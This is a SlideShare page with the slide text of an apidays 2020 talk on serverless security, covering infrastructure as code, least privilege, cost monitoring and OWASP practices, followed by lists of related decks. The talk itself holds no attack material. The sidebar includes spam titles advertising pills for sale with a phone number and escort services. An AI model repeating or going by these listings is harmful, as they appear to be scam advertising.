SlideShare une entreprise Scribd logo

apidays LIVE Paris - Serverless security: how to protect what you don't see? by Jean Baptiste Aviat

apidays
apidays

apidays LIVE Paris - Responding to the New Normal with APIs for Business, People and Society December 8, 9 & 10, 2020 Serverless security: how to protect what you don't see? Jean Baptiste Aviat, Co-founder and CTO at Sqreen.io

Technologie
1  sur  28
Télécharger pour lire hors ligne
Jean-Baptiste Aviat CTO & Co-founder Former (Red Team) Email: jb@sqreen.io Twitter: @jbaviat Podcast:
What is Serverless? And why is it different?
Business logic 100% written by developersDev Ops Code ⭐⭐⭐⭐⭐ Ops ⭐
Auth File upload Business service #1 Business service #2 Push service Async workers Dev Ops Code ⭐⭐⭐ Ops ⭐⭐⭐
Dev Ops Code ⭐ Ops ⭐⭐⭐
Dev Ops Dev Dev Ops Micro services Monolithic applications Serverless More code Less code Dev and ops distance Ops
Ad-hoc usage: easier to deploy Dynamically configure cloud elements, transform data on the go, comply to cloud vendors requirements. Teams use it to circumvent processes / CI / deploy. Native serverless applications Build applications designed for serverless infrastructures.
How does serverless impacts security?
Dev Sec Ops Dev Sec Ops Dev Sec Ops Serverless forces bridging dev, sec & ops Monolithic app Microservices Serverless
What “serverless” means is moving too fast Edge serverless, ad-hoc, infra Scale is different (1 monolithic app → 5 micro services → 100 serverless functions) No tool allows to visualize all of your lambas at once (and the spreadsheet doesn’t work for this scale and pace!) The space didn’t reach maturity yet: ● No commonly accepted best practices, but a broad variety of best practices ● Evolving fast
Monitoring Protection ❌ ❌
New challenges 🚨: ● No way to visualize deployments ● Best practices still change rapidly ● Entrypoints vary widely (HTTP? Queue? Stream? Database?) ● Higher coupling to the cloud provider requires high cloud security Solved challenges ✅: ● System updates (unless Docker based!) ● Network level security (mTLS, …) Scaling challenges 🤯: ● Developers do 20 ⨉ more ops ● 1 microservice = 20 ⨉ functions ● 20 ⨉ vulnerable dependencies? ● 20 ⨉ ownership tracking? ● 20 ⨉ threat modeling? ● 20 ⨉ faster new function appearance? ⨉
Serverless security: what can we do?
Use infrastructure as code (Terraform, cloud formation, …) Shift your infrastructure left ● With serverless, a part of the business logic is handled by the infrastructure ● Serverless app developers own both the code and a part of the infrastructure Use principle of least privilege for your lambdas (but with reasonable granularity!) Monitor your costs (and be ready to block abuses) * Network, encryption, mutual authentication is mostly ensured by proper cloud services usage. But is much simpler than for microservices*
Keep best practices Injections Vulnerable dependencies Lack of monitoring AuthN / AuthZ issues OWASP top 10 Scalability & coherency Design strong functions frameworks (CI, deployment, logging frameworks, …) NEW
New functions appear and disappear at a highest rate than ever Leverage developer’s tools as much as possible to: ● Monitor security controls are applied ● Monitor the permissions used ● Ensure production doesn’t drift vs IaC IaC / Terraform make it easy to inspect IaC / Terraform allows to apply static control (and break CI if needed) Cloud APIs allow to dynamically list and inspect running containers
● Maintain the OWASP top 10 ● Adopt a strong cloud security posture ● Generalize principle of least privilege ● Ensure serverless projects use IaC (Terraform, CloudFormation, …) ● Leverage cloud APIs to automate controls and monitoring ● Monitor serverless cost ● Ensure coherency amongst functions deployments OWASP top 10 Cloud security posture Serverless cost monitoring Unified deployments
Use Serverless framework or Terraform ● With safe, relevant examples ● Coupled with CI Provide relevant & safe code examples ● Using ORM / validation / log / … ● Coupled with CI Prepare provisioning for: ● A working deployment ● CI job to deploy & run linting / static analysers Document how to deploy secrets Git repositories best practices: ● Mandatory pull requests ● Require a CODEOWNERS file ● Lock master
Serverless shifts complexity from application code to the infrastructure. Serverless doesn’t mean no ops but: ● Different kind of ops are done by different personas ● Ops are much simpler compared to micro services (mTLS, peer to peer, etc.) Some security risks occur more (20 times!), some appear, and a few disappear. Cloud security takes a much more important stance. Scaling development practices (CI, CD, frameworks, BoM) becomes a requirement
CSA - The 12 Most Critical Risks for Serverless Applications OWASP top 10 OWASP serverless top 10 Serverless framework Terraform, CloudFormation CODEOWNERS (Github, Gitlab) AppSec Builders podcast Or get in touch / ask me directly: Email: jb@sqreen.io Twitter: @jbaviat Podcast:
Credits to Theodo Credits to Marcin Credits to https://twitter.com/alex_frantic?lang=en Podcast
Serverless is changing fast
Future More edge More glue 2016 Google Cloud Functions Azure Functions IBM Cloud Functions AWS Lambda @Edge 2014 AWS Lambda 2017 Cloudflare workers 2008 Google App Engine 2019 Fastly Edge workers 2020 Netlify functions
“ we are discovering new services, tools and patterns weekly ” Source: any serverless specialist.
Easier & faster to deploy Move from “your code does it all” towards “your code does the business logic, your Cloud Provider is the glue”

Recommandé

apidays LIVE Paris - Protecting financial grade API: adopting the right secur...
apidays LIVE Paris - Protecting financial grade API: adopting the right secur...apidays LIVE Paris - Protecting financial grade API: adopting the right secur...
apidays LIVE Paris - Protecting financial grade API: adopting the right secur...
apidays
 
apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...
apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...
apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...
apidays
 
A Starters Guide to Building APIs with Javascript
A Starters Guide to Building APIs with JavascriptA Starters Guide to Building APIs with Javascript
A Starters Guide to Building APIs with Javascript
All Things Open
 
Modernize applications and reduce TCO with Windows containers on Azure Servic...
Modernize applications and reduce TCO with Windows containers on Azure Servic...Modernize applications and reduce TCO with Windows containers on Azure Servic...
Modernize applications and reduce TCO with Windows containers on Azure Servic...
Microsoft Tech Community
 
apidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannot
apidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannotapidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannot
apidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannot
apidays
 
Microservices & API Gateways
Microservices & API Gateways Microservices & API Gateways
Microservices & API Gateways
Kong Inc.
 
TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...
TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...
TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...
Michael Kuehne-Schlinkert
 
I Love APIs 2015: Scaling Mobile-focused Microservices at Verizon
I Love APIs 2015: Scaling Mobile-focused Microservices at VerizonI Love APIs 2015: Scaling Mobile-focused Microservices at Verizon
I Love APIs 2015: Scaling Mobile-focused Microservices at Verizon
Apigee | Google Cloud
 

Recommandé

apidays LIVE Paris - Protecting financial grade API: adopting the right secur...
apidays LIVE Paris - Protecting financial grade API: adopting the right secur...apidays LIVE Paris - Protecting financial grade API: adopting the right secur...
apidays LIVE Paris - Protecting financial grade API: adopting the right secur...
apidays
 
apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...
apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...
apidays LIVE Paris - Creating a scalable ecosystem of Microservices by Archan...
apidays
 
A Starters Guide to Building APIs with Javascript
A Starters Guide to Building APIs with JavascriptA Starters Guide to Building APIs with Javascript
A Starters Guide to Building APIs with Javascript
All Things Open
 
Modernize applications and reduce TCO with Windows containers on Azure Servic...
Modernize applications and reduce TCO with Windows containers on Azure Servic...Modernize applications and reduce TCO with Windows containers on Azure Servic...
Modernize applications and reduce TCO with Windows containers on Azure Servic...
Microsoft Tech Community
 
apidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannot
apidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannotapidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannot
apidays LIVE Paris - Multicluster Service Mesh in Action by Denis Jannot
apidays
 
Microservices & API Gateways
Microservices & API Gateways Microservices & API Gateways
Microservices & API Gateways
Kong Inc.
 
TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...
TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...
TDD for APIs in a Microservice World (Short Version) by Michael Kuehne-Schlin...
Michael Kuehne-Schlinkert
 
I Love APIs 2015: Scaling Mobile-focused Microservices at Verizon
I Love APIs 2015: Scaling Mobile-focused Microservices at VerizonI Love APIs 2015: Scaling Mobile-focused Microservices at Verizon
I Love APIs 2015: Scaling Mobile-focused Microservices at Verizon
Apigee | Google Cloud
 
Tools for designing and building great APIs
Tools for designing and building great APIsTools for designing and building great APIs
Tools for designing and building great APIs
Kong Inc.
 
Engineering Manager, Edge Insights @Netflix
Engineering Manager, Edge Insights @NetflixEngineering Manager, Edge Insights @Netflix
Engineering Manager, Edge Insights @Netflix
Sangeeta Narayanan
 
DevSecOps - Security in DevOps
DevSecOps - Security in DevOpsDevSecOps - Security in DevOps
DevSecOps - Security in DevOps
Aarno Aukia
 
Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...
Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...
Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...
Tom Kerkhove
 
apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...
apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...
apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...
apidays
 
Node.js - Extending the Programmability of Apigee Edge
Node.js - Extending the Programmability of Apigee Edge Node.js - Extending the Programmability of Apigee Edge
Node.js - Extending the Programmability of Apigee Edge
Apigee | Google Cloud
 
Building Cloud-agnostic Serverless APIs
Building Cloud-agnostic Serverless APIsBuilding Cloud-agnostic Serverless APIs
Building Cloud-agnostic Serverless APIs
Postman
 
Everybody loves Swagger
Everybody loves SwaggerEverybody loves Swagger
Everybody loves Swagger
BizTalk360
 
Csa Summit 2017 - Un viaje seguro hacia la nube
Csa Summit 2017 - Un viaje seguro hacia la nubeCsa Summit 2017 - Un viaje seguro hacia la nube
Csa Summit 2017 - Un viaje seguro hacia la nube
CSA Argentina
 
Full Stack Application Monitoring for AWS Powered by AI
Full Stack Application Monitoring for AWS Powered by AIFull Stack Application Monitoring for AWS Powered by AI
Full Stack Application Monitoring for AWS Powered by AI
Dynatrace
 
Deep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaSDeep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaS
Apigee | Google Cloud
 
Securing aws workloads with embedded application security
Securing aws workloads with embedded application securitySecuring aws workloads with embedded application security
Securing aws workloads with embedded application security
John Varghese
 
Api gateway
Api gatewayApi gateway
Api gateway
enyert
 
Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?
James Wickett
 
apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...
apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...
apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...
apidays
 
Csa Summit 2017 - Managing multicloud environments
Csa Summit 2017 - Managing multicloud environmentsCsa Summit 2017 - Managing multicloud environments
Csa Summit 2017 - Managing multicloud environments
CSA Argentina
 
The Most Common Errors That Aren’t Caught
The Most Common Errors That Aren’t CaughtThe Most Common Errors That Aren’t Caught
The Most Common Errors That Aren’t Caught
Nordic APIs
 
What is an API Gateway?
What is an API Gateway?What is an API Gateway?
What is an API Gateway?
LunchBadger
 
[apidays Live Australia] How do you enhance customer experience through event...
[apidays Live Australia] How do you enhance customer experience through event...[apidays Live Australia] How do you enhance customer experience through event...
[apidays Live Australia] How do you enhance customer experience through event...
WSO2
 
I Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIs
I Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIsI Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIs
I Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIs
Apigee | Google Cloud
 
Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?
Sqreen
 
Cncf checkov and bridgecrew
Cncf checkov and bridgecrewCncf checkov and bridgecrew
Cncf checkov and bridgecrew
LibbySchulze
 

Contenu connexe

Tendances

Node.js - Extending the Programmability of Apigee Edge
Node.js - Extending the Programmability of Apigee Edge Node.js - Extending the Programmability of Apigee Edge
Node.js - Extending the Programmability of Apigee Edge
Apigee | Google Cloud
 
Building Cloud-agnostic Serverless APIs
Building Cloud-agnostic Serverless APIsBuilding Cloud-agnostic Serverless APIs
Building Cloud-agnostic Serverless APIs
Postman
 
Csa Summit 2017 - Un viaje seguro hacia la nube
Csa Summit 2017 - Un viaje seguro hacia la nubeCsa Summit 2017 - Un viaje seguro hacia la nube
Csa Summit 2017 - Un viaje seguro hacia la nube
CSA Argentina
 
Csa Summit 2017 - Managing multicloud environments
Csa Summit 2017 - Managing multicloud environmentsCsa Summit 2017 - Managing multicloud environments
Csa Summit 2017 - Managing multicloud environments
CSA Argentina
 

Tendances (20)

Tools for designing and building great APIs
Tools for designing and building great APIsTools for designing and building great APIs
Tools for designing and building great APIs
 
Engineering Manager, Edge Insights @Netflix
Engineering Manager, Edge Insights @NetflixEngineering Manager, Edge Insights @Netflix
Engineering Manager, Edge Insights @Netflix
 
DevSecOps - Security in DevOps
DevSecOps - Security in DevOpsDevSecOps - Security in DevOps
DevSecOps - Security in DevOps
 
Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...
Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...
Azure Lowlands 2020 - API management for microservices in a hybrid and multi-...
 
apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...
apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...
apidays LIVE Paris 2021 - APIGEE, different ways for integrating with CI/CD p...
 
Node.js - Extending the Programmability of Apigee Edge
Node.js - Extending the Programmability of Apigee Edge Node.js - Extending the Programmability of Apigee Edge
Node.js - Extending the Programmability of Apigee Edge
 
Building Cloud-agnostic Serverless APIs
Building Cloud-agnostic Serverless APIsBuilding Cloud-agnostic Serverless APIs
Building Cloud-agnostic Serverless APIs
 
Everybody loves Swagger
Everybody loves SwaggerEverybody loves Swagger
Everybody loves Swagger
 
Csa Summit 2017 - Un viaje seguro hacia la nube
Csa Summit 2017 - Un viaje seguro hacia la nubeCsa Summit 2017 - Un viaje seguro hacia la nube
Csa Summit 2017 - Un viaje seguro hacia la nube
 
Full Stack Application Monitoring for AWS Powered by AI
Full Stack Application Monitoring for AWS Powered by AIFull Stack Application Monitoring for AWS Powered by AI
Full Stack Application Monitoring for AWS Powered by AI
 
Deep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaSDeep Dive: Strategic Importance of BaaS
Deep Dive: Strategic Importance of BaaS
 
Securing aws workloads with embedded application security
Securing aws workloads with embedded application securitySecuring aws workloads with embedded application security
Securing aws workloads with embedded application security
 
Api gateway
Api gatewayApi gateway
Api gateway
 
Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?Serverless Security: Are you ready for the Future?
Serverless Security: Are you ready for the Future?
 
apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...
apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...
apidays LIVE LONDON - Discovering API Version differences with ease by Jaap B...
 
Csa Summit 2017 - Managing multicloud environments
Csa Summit 2017 - Managing multicloud environmentsCsa Summit 2017 - Managing multicloud environments
Csa Summit 2017 - Managing multicloud environments
 
The Most Common Errors That Aren’t Caught
The Most Common Errors That Aren’t CaughtThe Most Common Errors That Aren’t Caught
The Most Common Errors That Aren’t Caught
 
What is an API Gateway?
What is an API Gateway?What is an API Gateway?
What is an API Gateway?
 
[apidays Live Australia] How do you enhance customer experience through event...
[apidays Live Australia] How do you enhance customer experience through event...[apidays Live Australia] How do you enhance customer experience through event...
[apidays Live Australia] How do you enhance customer experience through event...
 
I Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIs
I Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIsI Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIs
I Love APIs 2015: The Mobile Screen Factor - At the Glass Integration with APIs
 

Similaire à apidays LIVE Paris - Serverless security: how to protect what you don't see? by Jean Baptiste Aviat

Serverless 101 in Montreal
Serverless 101 in MontrealServerless 101 in Montreal
Serverless 101 in Montreal
Aaron Williams
 
Log Analytics for Distributed Microservices
Log Analytics for Distributed MicroservicesLog Analytics for Distributed Microservices
Log Analytics for Distributed Microservices
Kai Wähner
 

Similaire à apidays LIVE Paris - Serverless security: how to protect what you don't see? by Jean Baptiste Aviat (20)

Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?Serverless security - how to protect what you don't see?
Serverless security - how to protect what you don't see?
 
Cncf checkov and bridgecrew
Cncf checkov and bridgecrewCncf checkov and bridgecrew
Cncf checkov and bridgecrew
 
Automated Serverless Pipelines with #GitOps on Codefresh
Automated Serverless Pipelines with #GitOps on CodefreshAutomated Serverless Pipelines with #GitOps on Codefresh
Automated Serverless Pipelines with #GitOps on Codefresh
 
ABN AMRO DevSecOps Journey
ABN AMRO DevSecOps JourneyABN AMRO DevSecOps Journey
ABN AMRO DevSecOps Journey
 
Measures to ensure Cyber Security in a serverless environment
Measures to ensure Cyber Security in a serverless environmentMeasures to ensure Cyber Security in a serverless environment
Measures to ensure Cyber Security in a serverless environment
 
What serverless means for enterprise apps
What serverless means for enterprise appsWhat serverless means for enterprise apps
What serverless means for enterprise apps
 
Serverless 101 in Montreal
Serverless 101 in MontrealServerless 101 in Montreal
Serverless 101 in Montreal
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
 
Enterprise serverless
Enterprise serverlessEnterprise serverless
Enterprise serverless
 
Stay productive while slicing up the monolith
Stay productive while slicing up the monolithStay productive while slicing up the monolith
Stay productive while slicing up the monolith
 
Stay productive while slicing up the monolith
Stay productive while slicing up the monolithStay productive while slicing up the monolith
Stay productive while slicing up the monolith
 
Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...Zerotrusting serverless applications protecting microservices using secure d...
Zerotrusting serverless applications protecting microservices using secure d...
 
Securing serverless system
Securing serverless systemSecuring serverless system
Securing serverless system
 
Securing Serverless Systems
Securing Serverless SystemsSecuring Serverless Systems
Securing Serverless Systems
 
Accelerate your Application Delivery with DevOps and Microservices
Accelerate your Application Delivery with DevOps and MicroservicesAccelerate your Application Delivery with DevOps and Microservices
Accelerate your Application Delivery with DevOps and Microservices
 
Slide DevSecOps Microservices
Slide DevSecOps Microservices Slide DevSecOps Microservices
Slide DevSecOps Microservices
 
Preparing for Neo - Singapore OutSystems User Group October 2022 Meetup
Preparing for Neo - Singapore OutSystems User Group October 2022 MeetupPreparing for Neo - Singapore OutSystems User Group October 2022 Meetup
Preparing for Neo - Singapore OutSystems User Group October 2022 Meetup
 
Will ServerLess kill containers and Operations
Will ServerLess kill containers and OperationsWill ServerLess kill containers and Operations
Will ServerLess kill containers and Operations
 
APIdays Paris 2018 - Will Serverless kill Containers and Operations? Stéphane...
APIdays Paris 2018 - Will Serverless kill Containers and Operations? Stéphane...APIdays Paris 2018 - Will Serverless kill Containers and Operations? Stéphane...
APIdays Paris 2018 - Will Serverless kill Containers and Operations? Stéphane...
 
Log Analytics for Distributed Microservices
Log Analytics for Distributed MicroservicesLog Analytics for Distributed Microservices
Log Analytics for Distributed Microservices
 

Plus de apidays

Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...
Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...
Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...
apidays
 

Plus de apidays (20)

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - The secrets to Graph success, by Leah Hurwich Adler, ...
Apidays New York 2024 - The secrets to Graph success, by Leah Hurwich Adler, ...Apidays New York 2024 - The secrets to Graph success, by Leah Hurwich Adler, ...
Apidays New York 2024 - The secrets to Graph success, by Leah Hurwich Adler, ...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Apidays New York 2024 - API Discovery - From Crawl to Run by Rob Dickinson, G...
Apidays New York 2024 - API Discovery - From Crawl to Run by Rob Dickinson, G...Apidays New York 2024 - API Discovery - From Crawl to Run by Rob Dickinson, G...
Apidays New York 2024 - API Discovery - From Crawl to Run by Rob Dickinson, G...
 
Apidays Singapore 2024 - Building with the Planet in Mind by Sandeep Joshi, M...
Apidays Singapore 2024 - Building with the Planet in Mind by Sandeep Joshi, M...Apidays Singapore 2024 - Building with the Planet in Mind by Sandeep Joshi, M...
Apidays Singapore 2024 - Building with the Planet in Mind by Sandeep Joshi, M...
 
Apidays Singapore 2024 - Connecting Cross Border Commerce with Payments by Gu...
Apidays Singapore 2024 - Connecting Cross Border Commerce with Payments by Gu...Apidays Singapore 2024 - Connecting Cross Border Commerce with Payments by Gu...
Apidays Singapore 2024 - Connecting Cross Border Commerce with Payments by Gu...
 
Apidays Singapore 2024 - Privacy Enhancing Technologies for AI by Mark Choo, ...
Apidays Singapore 2024 - Privacy Enhancing Technologies for AI by Mark Choo, ...Apidays Singapore 2024 - Privacy Enhancing Technologies for AI by Mark Choo, ...
Apidays Singapore 2024 - Privacy Enhancing Technologies for AI by Mark Choo, ...
 
Apidays Singapore 2024 - Blending AI and IoT for Smarter Health by Matthew Ch...
Apidays Singapore 2024 - Blending AI and IoT for Smarter Health by Matthew Ch...Apidays Singapore 2024 - Blending AI and IoT for Smarter Health by Matthew Ch...
Apidays Singapore 2024 - Blending AI and IoT for Smarter Health by Matthew Ch...
 
Apidays Singapore 2024 - OpenTelemetry for API Monitoring by Danielle Kayumbi...
Apidays Singapore 2024 - OpenTelemetry for API Monitoring by Danielle Kayumbi...Apidays Singapore 2024 - OpenTelemetry for API Monitoring by Danielle Kayumbi...
Apidays Singapore 2024 - OpenTelemetry for API Monitoring by Danielle Kayumbi...
 
Apidays Singapore 2024 - Connecting Product and Engineering Teams with Testin...
Apidays Singapore 2024 - Connecting Product and Engineering Teams with Testin...Apidays Singapore 2024 - Connecting Product and Engineering Teams with Testin...
Apidays Singapore 2024 - Connecting Product and Engineering Teams with Testin...
 
Apidays Singapore 2024 - The Growing Carbon Footprint of Digitalization and H...
Apidays Singapore 2024 - The Growing Carbon Footprint of Digitalization and H...Apidays Singapore 2024 - The Growing Carbon Footprint of Digitalization and H...
Apidays Singapore 2024 - The Growing Carbon Footprint of Digitalization and H...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...
Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...
Apidays Singapore 2024 - API Monitoring x SRE by Ryan Ashneil and Eugene Wong...
 
Apidays Singapore 2024 - A nuanced approach on AI costs and benefits for the ...
Apidays Singapore 2024 - A nuanced approach on AI costs and benefits for the ...Apidays Singapore 2024 - A nuanced approach on AI costs and benefits for the ...
Apidays Singapore 2024 - A nuanced approach on AI costs and benefits for the ...
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
Apidays Singapore 2024 - How APIs drive business at BNP Paribas by Quy-Doan D...
Apidays Singapore 2024 - How APIs drive business at BNP Paribas by Quy-Doan D...Apidays Singapore 2024 - How APIs drive business at BNP Paribas by Quy-Doan D...
Apidays Singapore 2024 - How APIs drive business at BNP Paribas by Quy-Doan D...
 

Dernier

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Dernier (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
